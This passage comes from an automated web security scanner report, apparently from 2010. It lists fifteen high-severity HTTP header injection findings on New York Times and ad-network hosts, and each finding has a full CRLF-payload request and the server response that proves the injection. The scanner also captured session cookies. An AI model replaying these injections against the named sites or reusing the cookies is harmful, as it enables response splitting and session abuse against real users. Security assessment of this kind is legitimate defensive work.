Path:	/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a8150%0d%0a9885d629a2a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /psc/TAM/a8150%0d%0a9885d629a2a/HRMS/c/HRS_HRAM.HRS_CE.GBL HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: careers.nytco.com
Connection: Keep-Alive
Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 13 Nov 2010 02:06:00 GMT
Location: https://careers.nytco.com/psc/TAM/a8150
9885d629a2a/HRMS/c/HRS_HRAM.HRS_CE.GBL?&
Content-Type: text/html
Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyLwp6fh267CFb37d08fd519kxhjTgz!-9483320; path=/
Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=ibZNGO816CGmgoP+8wRDiOW9hzIWf9juKF29s4WauEjAoyGVrp0LscD5ghKu0DQKX6pY+xhT8lIghvjTkc++8/M/VES3ZdaLrnNm7pq0h2Vz3ljuB7NHtI5DQwSnEDUMyZwu4GybmH6PsHDSitdqiiEvb71ZKVC0; path=/
Content-Length: 365

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://careers.nytco.com/psc/TAM/
...[SNIP]...

2.12. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://careers.nytco.com
Path:	/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 7fc66%0d%0a8dd5b3d6a61 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /psc/TAM/EMPLOYEE/7fc66%0d%0a8dd5b3d6a61/c/HRS_HRAM.HRS_CE.GBL HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: careers.nytco.com
Connection: Keep-Alive
Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 13 Nov 2010 02:06:01 GMT
Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/7fc66
8dd5b3d6a61/c/HRS_HRAM.HRS_CE.GBL?&
Content-Type: text/html
Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJzJTQg31ZypJwG88s70yLh2LJnTcg!-9483320; path=/
Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=pv96knwIQLv8M6q+0wxVNoOH8UELVDAjmi5lOFUVLvLHLUcMZEE4VI+/2ppEGLojoOblLO2MXE0zbBLPh4G9gikNQpZ1CNnvWvuuqEYaNeD+zsteWFi355m2PmuxZ9pj++X8MGRqkm2QgXCsJaP58kYmNVL+5vSy; path=/
Content-Length: 373

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://careers.nytco.com/psc/TAM/
...[SNIP]...

2.13. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://careers.nytco.com
Path:	/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 122a5%0d%0af997558f359 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /psc/TAM/EMPLOYEE/HRMS/122a5%0d%0af997558f359/HRS_HRAM.HRS_CE.GBL HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: careers.nytco.com
Connection: Keep-Alive
Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 13 Nov 2010 02:06:01 GMT
Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/122a5
f997558f359/HRS_HRAM.HRS_CE.GBL?&
Content-Type: text/html
Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJFm1qTLtKy2GrV8L5Ldmky3htJyGD!-9483320; path=/
Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=6zUc1Hr+hS8fzguR93ZUHsyJw2D+pTonngW4GKmuJP1Uu6XCofTPdoPRiY6t6ilNZb3U41AiOXsvgiZZ4b7ONkeraFa7TgACwmKFYbx6fq6Xn6F1I/aTFXpFXDJSkH7qUlFP9FTkvXZKz6nzhK0SmMV8P2IqxLgs; path=/
Content-Length: 379

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://careers.nytco.com/psc/TAM/
...[SNIP]...

2.14. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://careers.nytco.com
Path:	/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload bda3d%0d%0a16b48f1ff0c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /psc/TAM/EMPLOYEE/HRMS/c/bda3d%0d%0a16b48f1ff0c HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: careers.nytco.com
Connection: Keep-Alive
Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 13 Nov 2010 02:06:01 GMT
Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/bda3d
16b48f1ff0c?&
Content-Type: text/html
Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJR4BQYkGJqp5ZL2X8GZGbXcMSf98p!-9483320; path=/
Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=7t0h06Q/IRWLHue1c9MOGG3EKVj3snl0QIoYoY3JzcLvmvO9K8XlUvIN6Y8k7AxfIBUNxUC3514n2pcAQA2hW+2E3lO6ayKzaN3t3KdXF+99ca85Af21gWJmvWwcZWSQIk43wSRWOFf+SzvaJVxjU/d5Uq6c9VPt; path=/
Content-Length: 343

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://careers.nytco.com/psc/TAM/
...[SNIP]...

2.15. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies2.nytimes.com
Path:	/gst/movies/movie.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a35a%0d%0a19b04d91325 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a35a%0d%0a19b04d91325/movies/movie.html?v_id=451514 HTTP/1.1
Host: movies2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:07:15 GMT
Content-length: 0
Content-type: text/html
Location: http://movies.nytimes.com/pages/movies/index.html/7a35a
19b04d91325/movies/movie.html?v_id=451514

2.16. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies2.nytimes.com
Path:	/gst/movies/movie.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5a82d%0d%0adf25b0b4f75 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /gst/5a82d%0d%0adf25b0b4f75/movie.html?v_id=451514 HTTP/1.1
Host: movies2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:08:05 GMT
Content-length: 0
Content-type: text/html
Location: http://movies.nytimes.com/pages/movies/index.html/gst/5a82d
df25b0b4f75/movie.html?v_id=451514

2.17. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies2.nytimes.com
Path:	/gst/movies/movie.html

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload e822f%0d%0a652f2e24a5a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /gst/movies/e822f%0d%0a652f2e24a5a?v_id=451514 HTTP/1.1
Host: movies2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:08:10 GMT
Content-length: 0
Content-type: text/html
Location: http://movies.nytimes.com/pages/movies/index.html/gst/movies/e822f
652f2e24a5a?v_id=451514

2.18. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://na.link.decdna.net
Path:	/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw

Issue detail

The value of the 11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq request parameter is copied into the location response header. The payload 52713%0d%0a256b90df09e was submitted in the 11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter. This caused a response containing an injected HTTP header.

Request

GET /n/78471/87266/ad.vulnerable.ad.partner/dfwcxw;11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq=52713%0d%0a256b90df09e&247cr=4059381386 HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 02:06:42 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Sat, 13 Nov 2010 02:06:42 GMT
location: http://ad.vulnerable.ad.partner52713
256b90df09e
Set-Cookie: %2edecdna%2enet/%2fn%2f78471/2/e=1289614002/78471/87266/1/0//8///764076663/0/0/96966748///0/1289614002/ct%2c/0/http%3a%2f%2fad%2edoubleclick%2enet52713%0d%0a256b90df09e/22888697/4059381386; expires=Mon, 13-Dec-2010 02:06:42 GMT; path=/n/78471; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286422803672728651; expires=Sun, 13-Nov-2011 02:06:42 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286422803672729261; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

2.19. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://na.link.decdna.net
Path:	/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload 493a9%0d%0a20f05077930 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/78471/87266/493a9%0d%0a20f05077930/dfwcxw;11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq=%2fclk%3b222387429%3b46056971%3bq%3fhttp%3a%2f%2fr%2eclickforensics%2ecom%2f2464%2fC029ED6A4E%2fwww%2ehelppreventhepatitis%2ecom%2fhelp%2dprotect%2dyourself%2fhepatitis%2dprotection%2ehtml%3frotation%3d46056971%26banner%3d222387429%26src%3d1%26kw%3dp&247cr=4059381386 HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 02:06:45 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Sat, 13 Nov 2010 02:06:45 GMT
location: http://493a9
20f05077930/clk;222387429;46056971;q?http://r.clickforensics.com/2464/C029ED6A4E/www.helppreventhepatitis.com/help-protect-yourself/hepatitis-protection.html?rotation=46056971&banner=222387429&src=1&kw=p
Set-Cookie: %2edecdna%2enet/%2fn%2f78471/2/e=1289614005/78471/87266/1/0//8///764076663/0/0/96966748///0/1289614005/ct%2c/0/http%3a%2f%2f493a9%0d%0a20f05077930%2fclk%3b222387429%3b46056971%3bq%3fhttp%3a%2f%2fr%2eclickforensics%2ecom%2f2464%2fC029ED6A4E%2fwww%2ehelppreventhepatitis%2ecom%2fhelp%2dprotect%2dyourself%2fhepatitis%2dprotection%2ehtml%3frotation%3d46056971%26banner%3d222387429%26src%3d1%26kw%3dp/22888697/4059381386; expires=Mon, 13-Dec-2010 02:06:45 GMT; path=/n/78471; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286422803941163528; expires=Sun, 13-Nov-2011 02:06:45 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286422803941163819; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

2.20. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nytimes.com
Path:	/ref/membercenter/help/infoservdirectory.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f7dbb%0d%0aef896eaeb9a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f7dbb%0d%0aef896eaeb9a/membercenter/help/infoservdirectory.html HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:07:13 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/f7dbb
ef896eaeb9a/membercenter/help/infoservdirectory.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.21. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nytimes.com
Path:	/ref/membercenter/help/infoservdirectory.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c6f96%0d%0a63068f27cab was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /ref/c6f96%0d%0a63068f27cab/help/infoservdirectory.html HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:08:00 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/ref/c6f96
63068f27cab/help/infoservdirectory.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.22. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nytimes.com
Path:	/ref/membercenter/help/infoservdirectory.html

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d8dfd%0d%0a52675aa17e1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /ref/membercenter/d8dfd%0d%0a52675aa17e1/infoservdirectory.html HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:08:00 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/ref/membercenter/d8dfd
52675aa17e1/infoservdirectory.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.23. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nytimes.com
Path:	/ref/membercenter/help/infoservdirectory.html

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload ba656%0d%0ac1c6899a20 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /ref/membercenter/help/ba656%0d%0ac1c6899a20 HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:07:59 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/ref/membercenter/help/ba656
c1c6899a20
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.24. http://nytimes.com/rss [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nytimes.com
Path:	/rss

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7df2a%0d%0a5589811a206 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7df2a%0d%0a5589811a206 HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:07:11 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/7df2a
5589811a206
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.25. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel2519.everesttech.net
Path:	/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click

Issue detail

The value of REST URL parameter 3 is copied into the Set-Cookie response header. The payload 56e58%0d%0ad99abd59502 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /2519/rq/56e58%0d%0ad99abd59502/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click HTTP/1.1
Host: pixel2519.everesttech.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 02:36:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k
Set-Cookie: everest_session_v2=7KpM3fm0AwAAKus; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~7KpM3fm0AwAAKus; path=/; domain=.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache, max-age=0
Set-Cookie: everest_cookie=ev_surferid~7KpM3fm0AwAAKus~ev_uid~2519~ev_sid~56e58
d99abd59502~ev_clientid~c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229~ev_clickid~7KpM3fm0AwAAKus~ev_clicktime~20101113023636; path=/; domain=pixel2519.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT
Location: http://clickserve.dartsearch.net/link/click?ev_userid=2519&ev_sid=56e58
d99abd59502&ev_clientid=c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229&url=http:/clickserve.dartsearch.net/link/click&ef_id=7KpM3fm0AwAAKus:20101113023636:s
Expires: Sat, 13 Nov 2010 02:36:36 GMT
Content-Length: 547
Keep-Alive: timeout=15, max=584
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://clickserve.dartsearch.net/link/click?ev_
...[SNIP]...

2.26. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel2519.everesttech.net
Path:	/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click

Issue detail

The value of REST URL parameter 4 is copied into the Set-Cookie response header. The payload b5412%0d%0acbbc9e6376e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /2519/rq/3/b5412%0d%0acbbc9e6376e/url=http:/clickserve.dartsearch.net/link/click HTTP/1.1
Host: pixel2519.everesttech.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 02:36:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k
Set-Cookie: everest_session_v2=s5ZM3fm0AQAAAaI; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~s5ZM3fm0AQAAAaI; path=/; domain=.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache, max-age=0
Set-Cookie: everest_cookie=ev_surferid~s5ZM3fm0AQAAAaI~ev_uid~2519~ev_sid~3~ev_clientid~b5412
cbbc9e6376e~ev_clickid~s5ZM3fm0AQAAAaI~ev_clicktime~20101113023636; path=/; domain=pixel2519.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT
Location: http://clickserve.dartsearch.net/link/click?ev_userid=2519&ev_sid=3&ev_clientid=b5412
cbbc9e6376e&url=http:/clickserve.dartsearch.net/link/click&ef_id=s5ZM3fm0AQAAAaI:20101113023636:s
Expires: Sat, 13 Nov 2010 02:36:36 GMT
Content-Length: 503
Keep-Alive: timeout=15, max=553
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://clickserve.dartsearch.net/link/click?ev_
...[SNIP]...

